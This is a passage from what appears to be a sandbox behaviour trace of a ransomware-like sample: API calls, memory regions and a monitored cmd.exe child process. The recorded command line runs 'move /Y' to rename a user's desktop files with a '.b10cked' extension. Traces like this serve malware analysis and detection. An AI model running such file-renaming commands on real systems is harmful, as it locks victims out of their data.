[0220.677] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.678] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.678] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.678] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.678] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.678] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.678] _wcsicmp (_String1="DDLQZM~1.PNG", _String2=".") returned 54 [0220.678] _wcsicmp (_String1="DDLQZM~1.PNG", _String2="..") returned 54 [0220.678] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm~1.png")) returned 0x20 [0220.678] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x411d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.678] SetErrorMode (uMode=0x0) returned 0x0 [0220.678] SetErrorMode (uMode=0x1) returned 0x0 [0220.678] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", nBufferLength=0x104, lpBuffer=0x2ef1a4, lpFilePart=0x2ef18c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", lpFilePart=0x2ef18c*="DDLQZM~1.PNG") returned 0x25 [0220.678] SetErrorMode (uMode=0x0) returned 0x1 [0220.678] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.679] _wcsicmp (_String1="DDLQZM~1.PNG", _String2=".") returned 54 [0220.679] _wcsicmp (_String1="DDLQZM~1.PNG", _String2="..") returned 54 [0220.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm~1.png")) returned 0x20 [0220.679] SetErrorMode (uMode=0x0) returned 0x0 [0220.679] SetErrorMode (uMode=0x1) returned 0x0 [0220.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", nBufferLength=0x104, lpBuffer=0x2ef620, lpFilePart=0x2ef3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", lpFilePart=0x2ef3b8*="DDLQZM~1.PNG") returned 0x25 [0220.679] SetErrorMode (uMode=0x0) returned 0x1 [0220.679] SetErrorMode (uMode=0x0) returned 0x0 [0220.679] SetErrorMode (uMode=0x1) returned 0x0 [0220.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked", nBufferLength=0x104, lpBuffer=0x2ef828, lpFilePart=0x2ef3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked", lpFilePart=0x2ef3b8*="DDlQzm1zrUmfqtdJ.png.b10cked") returned 0x35 [0220.679] SetErrorMode (uMode=0x0) returned 0x1 [0220.679] SetLastError (dwErrCode=0x0) [0220.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png.b10cked")) returned 0xffffffff [0220.679] GetLastError () returned 0x2 [0220.679] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x2eed34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed34) returned 0x400f20 [0220.680] FindNextFileW (in: hFindFile=0x400f20, lpFindFileData=0x2eed34 | out: lpFindFileData=0x2eed34) returned 0 [0220.680] GetLastError () returned 0x12 [0220.680] FindClose (in: hFindFile=0x400f20 | out: hFindFile=0x400f20) returned 1 [0220.681] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x411af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x411af0) returned 0x400f20 [0220.681] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked", nBufferLength=0x104, lpBuffer=0x2eefcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked", lpFilePart=0x0) returned 0x35 [0220.681] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png", nBufferLength=0x104, lpBuffer=0x2eefcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png", lpFilePart=0x0) returned 0x2d [0220.681] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png")) returned 0x20 [0220.681] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png.b10cked"), dwFlags=0x3) returned 1 [0220.682] FindClose (in: hFindFile=0x400f20 | out: hFindFile=0x400f20) returned 1 [0220.683] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eef80 | out: _Buffer=" 1") returned 9 [0220.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.683] GetFileType (hFile=0x7) returned 0x2 [0222.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef0c | out: lpMode=0x2eef0c) returned 1 [0222.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eef40 | out: lpConsoleScreenBufferInfo=0x2eef40) returned 1 [0222.925] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.926] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x2eef80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.926] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eef64, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x2eef64*=0x1a) returned 1 [0222.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.926] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.927] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.927] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.927] SetConsoleInputExeNameW () returned 0x1 [0222.927] GetConsoleOutputCP () returned 0x1b5 [0222.927] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.927] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.927] exit (_Code=0) Process: id = "579" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xd54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32954 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32955 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32956 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32957 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 32958 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32959 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32960 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32961 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32962 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 32963 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33104 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33105 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33106 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33107 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 33108 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 33109 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33110 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33111 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33112 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33113 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33114 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33115 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33116 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33117 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33118 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 33119 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33120 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33121 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33122 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 33123 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 33124 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 33125 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 33126 start_va = 0x650000 end_va = 0x124ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 33127 start_va = 0x1250000 end_va = 0x13b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Thread: id = 783 os_tid = 0xd28 [0220.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f87c | out: lpSystemTimeAsFileTime=0x18f87c*(dwLowDateTime=0xb84c7480, dwHighDateTime=0x1d440a9)) [0220.623] GetCurrentProcessId () returned 0xd54 [0220.623] GetCurrentThreadId () returned 0xd28 [0220.623] GetTickCount () returned 0x3d90f [0220.623] QueryPerformanceCounter (in: lpPerformanceCount=0x18f874 | out: lpPerformanceCount=0x18f874*=27741234773) returned 1 [0220.624] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.624] __set_app_type (_Type=0x1) [0220.624] __p__fmode () returned 0x76b331f4 [0220.624] __p__commode () returned 0x76b331fc [0220.624] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.624] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.624] GetCurrentThreadId () returned 0xd28 [0220.624] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd28) returned 0x38 [0220.624] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.624] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.624] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.625] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.625] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f80c | out: phkResult=0x18f80c*=0x0) returned 0x2 [0220.625] VirtualQuery (in: lpAddress=0x18f843, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.625] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.625] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.625] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.625] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f7dc, dwLength=0x1c | out: lpBuffer=0x18f7dc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.625] GetConsoleOutputCP () returned 0x1b5 [0220.625] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.625] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.625] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.625] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.625] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.625] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.625] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.626] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.626] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.626] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.626] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.626] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.626] GetEnvironmentStringsW () returned 0x2b0198* [0220.626] FreeEnvironmentStringsW (penv=0x2b0198) returned 1 [0220.626] GetEnvironmentStringsW () returned 0x2b0198* [0220.626] FreeEnvironmentStringsW (penv=0x2b0198) returned 1 [0220.626] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e77c | out: phkResult=0x18e77c*=0x40) returned 0x0 [0220.626] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0xc0, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x1, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x1, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x0, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x40, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x40, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x40, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegCloseKey (hKey=0x40) returned 0x0 [0220.627] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e77c | out: phkResult=0x18e77c*=0x40) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x40, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x1, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x1, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x0, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x9, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x4, lpData=0x18e788*=0x9, lpcbData=0x18e780*=0x4) returned 0x0 [0220.627] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e784, lpData=0x18e788, lpcbData=0x18e780*=0x1000 | out: lpType=0x18e784*=0x0, lpData=0x18e788*=0x9, lpcbData=0x18e780*=0x1000) returned 0x2 [0220.627] RegCloseKey (hKey=0x40) returned 0x0 [0220.627] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.627] srand (_Seed=0x5b8863b6) [0220.627] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"" [0220.627] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"" [0220.627] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.628] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.628] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.628] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.628] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.628] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.628] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.628] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.628] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.628] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.628] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.628] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.628] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.628] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.628] GetEnvironmentStringsW () returned 0x2b22e8* [0220.628] FreeEnvironmentStringsW (penv=0x2b22e8) returned 1 [0220.628] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.628] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.628] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.628] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.629] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.629] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.629] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.629] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.629] _wcsicmp 